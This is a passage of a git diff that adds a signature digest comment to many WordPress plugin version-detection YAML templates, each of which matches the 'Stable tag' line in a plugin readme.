b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022011f85a18447ff448d109a0433febb9f8727ded57766fd8ba80d31b6058e1a350022008759eafea04b10896bb4355555670f1d2272cb38da91efb2259d3bd2eb45eac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..19d317ffa8 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009a23998cc90decc40981cb31cc864550865e6251a2c3b85f039db19961500120022028dbcd170f15a83a85d19ee42fd87da5169a495f2ea5b70464299de56929d13e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..7c2bc7fc7c 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ce7607354ffbd0c6edf64b9f09bc3b5e170bc5eba7d64a2531dae81c8435c844022100b50b2eddded8c1ece094c98530e583ad4fcfdf4c80924f376740919d5a568741:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..65abd44a36 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f1b42628d60cdb8d761ec22ebc34e1266b2e288637d1408d355608942596727a022016b994ba1d89d06f67aca3d67448816f5295c5e1388555e74a9fdb9ce8e9ddd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..9797b563d8 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008f2710add8dc7ba07d9bcd4054db30f6800216725d5ce413c6e89449a0b11e6b022100d362cb55b6719c7183710d999331ce302beacbe382becc20a25a761dc1877964:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..14d9002152 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200ee1025c95b5a716ddd952fb681405b4bb79f4c49062e84a80a29a005a53fb8f02200807465c86930997a8f42de5696742add674c864bad2814690688a82d8390c3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..75764cf3ef 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100950a254061a9f4333ed1d6b4cde994fe094b918a43e796a4b44236cbdb15ff01022100dfcae8f7a976cd502d31d6119783f695aac6e004a679c221a7d174bfe8fbfa9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..a98c1f3b0f 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100aa07b543553bcbf298cd20833dac22d3309ade0e5f582cf3ca443de8bc4f3499022100c6aec46e5e4390780bf50b576646b05da18121407bd138878a232f448928bdfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..b178ae71ac 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100da919fa1a860ce5e7293971adad434fbe43caad3ed1ee5b3f7de49780108aefc022100b56e41b80436f0e0209f54fc1d249904476aaa362c248ab60607d1fa0a38a51e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..1433c032d3 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022003e7bb755e61bf228a1a866d8c4c9478623c53f93511aa7cd74addd85104e83b02206438794ba370a44f90e0470f0bf889b02dc0156c3f95cc5403f6008e1aec4fa0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..841a5de932 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009aeed5e82d2edca95813538ef1e6d2dfb4484d45f0e97075dfcbc7aedff8cac2022100a918d568502a8403d0c22f8d995e578940e42d74a396924de9e6f60737729e9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..5647844abf 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220118669fd621d8bc6045fd32d2c5dd90a4d0c427fa19e3db2c4686bd3d8c3d149022005f7269c1de6320915f40dd85b4f9f3e87c9125b62d3b473b53b8092c91992db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..3e2b964e09 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cbed62875d3692e3f3e9705bb48c8eab5bf6f28ba462607a07365e2a4050048c022100aa2d0905eabc20d45736a849fbcdd3e9e54f38f729901b6bf8fb5bd97ef4a19c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..1f82539cb2 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022050b192331ce5e822e33402dd92a8002f9d5962fc086058a482215fa8ec31adb502203779749438d08de3122ca1acf91eaa6b5d71e616315d9b82bca9ec8f9f89d96d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..242758c719 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022052ab1b165373a65038ba5d21657088bc61190c4dbd633b787bafe14872a5be520220209de48da1e61227320ae2e450142291bd5c24f1caf36d0ebfbca616f1af8e46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..be11f37b62 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a7c325ec42e7b460db367853d16a7b89f71bc6c2cb726da19e69406f9aee847e022038e88ff320bf24e13702b3b6e14b627444a12cd16200b232e39fb2d14f1dabf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..37196f35d3 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e340f466e81bcb1d29bc2aa4e9905cf3fa94a0eac98b175de5182a6f7c580075022100fce1c938bc50f3ec87cbc1b83eb32870f10e5cd6fc08da91eeab1f26ab1ff72e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..072f389604 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220726dfeb1b9aec239a8781a91130662a6c9bbe0b1d2ec6895f08dcf00cd65b38c02206f92900b2194d1b5d6306ec2c9e9762ca10f8ea9032c94a274dd0cf79a163944:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..f52ac46b3c 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022034c2b56e637f1e917bb28d7161e1697868aa593e5017976991b41b969a8cc55d022043852cf78532243a98502e7afee264a060823b43cf007857a07437932fd2328b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..861281ce9e 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022067410e737af5cf30a97c4ee1b8a6c9399f0db4d0ca0584a0cc16916cf451e8cf02201faa8fa9a10711df21ff5a3e0f4bc06682054d79579a642f762101ef3ebe1d62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..642b41ea90 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e2ca75c7396c42a435468465ca5f9c862c8f1119b610c19667bb783fa8929b5c022100cf2337b16d63e5a437490f7772b0a9c9a01e9404b0dd0407c6e96e0cea983431:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index 4a3dcbd210..fd28201f05 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022079e14c32b1b1dcdc5c8dcb9569dca76ee1835a97bf30a7a394eb1ab8b98cf7ec022100a3cf28e73ae7ca74e43f166f322d0ad73f94b0618cbacc75347b579baec72cac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..9001fd747c 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207af2d3226ebe74556cfdb256f7a8114f7f2876394b303d235fd7fd914fc8983502205643add2a051fb0cb856cf215fa8dca28eecd90383c03148d33ef08c00e73f90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..324f0a0db9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022024506a35e4a3879be770e15d99b3177cead88fdf829b79791dd6cccfb62947d5022100fb9c6bb1f2fe1da117e6f85796d0f533214d9e206521b822033188cf325ca9c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..2c1de654fe 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022001351879f35ffbfc616588ba613f89fe1c29cdd3b7c15fa1e2ea72c54a24643d02202cb7ae5dae42c0b5df3123d7434b21e3de3e119aada7ccc4fceadde9bb210dca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..1b097379e1 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205853bfafab9bc4ce91db030acbc31bc432172c03ec7724a027319325b4903e8802207c34979e24a8e94ab7bd37594da35c8bb1fee8f8d631afb7947e2ad91e66d787:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..544818b072 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a721fd9533d038a6f2cdcc70cb90b4ef5284c9051866fb9f2bda451d27079bdb022100a1974f14bf5112214149d1a3aead9f9e1943367d19ed377a509f3bf916007c1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..3a60595b0e 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022025b1b79c11d9c1d05ebebcad7adf413510695b8059975da36d9801f9f815cd3702205c0c54a7309e9c4e359af0b4823e0dbc9b6dc2d57d4e6f06cd80fad5f10208df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..2d9319a746 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c63a8fe7182517e45a40ee901e5f0d075881df55786afa73b2060d4874c8917002204843b014cafede43460ab142e2b774a82ca06d41891b4927bf29a0a5f009d682:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..af36497997 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220598a4b568a391728619b731cb348216873a586ad30dbaf54195a741154f1d1ac022100d03389b3c000e3c112e112861bcc9f9df0b35b2a10b7b50815ef0b43c94b9ad8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..fab20e5b6a 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210087f605093b6a11a128e16f4ed25eab0a7a03b68fbb846132f6766cb35774519402200877160a9cf7d0abd9953b634c945859508bd6ca830a7b1eb6eff439a9e33a84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1..ed9b98966a 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009004c80984e3f18d57a940ede6d5aee63fef3a352398452a0b127a4e458e7a3f022100e37f1f4ed4a88c06927810f8459b6d98b4c42b469d1e321fd0ca7918df62b0ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..17bfd4c5c5 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100833ff19b9930d0f8c9f206e50843dff7862a23d814f2577f3b09d3084a7ee70a02207bf5566f22d1ae0516df07e88eb47d4d4d22b3b2a0af1d320b355ac68970397b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..ab84ed3c69 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d905fc7ab715040289a6e6516f734706fbb19a1a8b5c32d10e5d481514ca7e99022100de6ff64997091ef385eba7e1b2f88387204504c869a5d93994f222d99af87013:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..93c09a7274 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220685907c041d24bb47b1397f231f8b74facea73a0915fa05d7b8ec150fb14cb0f022100fb8cbec5865a6190bc049324679df8c8fc0961b462942b058fa2dfc3fc4a932d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..15db0a0ea5 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022073965b5a62d36c00a65166954f32d93eb10b8ebf8a3e0fc541fe71b5558733e4022100b2fe7426281d2ea9f594334cd3087de5d48892feb27f1253dfa2a4c4d558b172:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..9e4e6ab046 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022000a0b2ca7d1d4b5f9c8f6f8ea2c09291f86ad718c6ad37198ec48a2279b007da0221008f23686fb62adebaa6ccb4e85e67463b9b30ffcece5e788b197be1e61dc1d902:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..8cc2b28970 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203f43527e2330cee2af1ad97a41689d5d27d8996680f626a623e6b2fb1c82b4aa022008b443a277469d585425d5a381417922748510213dde4c834680e0b697f5ad98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..7720890f4a 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cb35ff3426b9a8fd30d49d585f037137b535cfe2a16ade552e397e4e44f1f50a022100a5aafdda77b048e9f628f6820f0340a161cf51fcd31d6b2c63663770a8482e1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..c8ba1dbde2 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d79aaac98682ebf2a3e6c0f8f819a9e9e88897ae856c78bea8f9efba4dbd1775022038917d76887481cf03aabeec2f05735c4433e66f07da33eedbf8c4605dfb961b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..dc55c2ac99 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207d8729c2646d34127745472379934a8fc989c5fe0560399e3034174c2060b8d3022100e75b9fc56d6446f27a9c3aa81cc225d20a679f38003f2045d923bfa689bb1488:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..2b20ee07ed 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205e3b2754cbadee3dd5f7e1c2838a0d6619419221e025cdfc994680cd8068524c022100a69b286809d775f512eed8c4ea7c5e2a4f7fa13faf2da6a58bca3d0bb8d49eb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..9c506a02b7 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ab1ceb4a956e9bcb9a72b41d4446208ccc9b2a96fa0e30611bded45c2f20b279022021b361df6e0433ca4cd6674001ddbe5bcdc21239c82cbc9a597ad279bcf4f3f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..39337323af 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220208540394e8b59ac398ff3c49e91aeaf26a989f52d29434ad298a259254c4e2d022100e6f80dcc1f5e93ca4be6716b7e3fdacbdc119c820534b09dc667603098350219:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index fea9594fa0..52bd19e31d 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202e0c76c0ea35df5a58c7e147b74c1796f2ba9c39a66a4e4c587729c0e220f6c502205d72bd34b12e35eee2b7a279bde1dc23cc5891a00edf575e333593380ac1194a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..a2124fc30d 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100aa4040da4c1aa871e70dd9602c055cf7d755d1c6fba0d05ae8d8bdaa6573a068022100962e7fd88f63099ce02ee4c2651b7f7863cc3e32be16cdee93d72ce8cad24ff9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..06bcf9ea59 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210089bc58bc4129ce6bdb78dc9d38d3ce7fee1658c7d23f13ec65ea4f75d2eeffbc02202c4f1d0850fc0ef3e9bfbdb28f24e04342ab94c71fc4dcea62e3046979e465df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..001b07a21d 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ 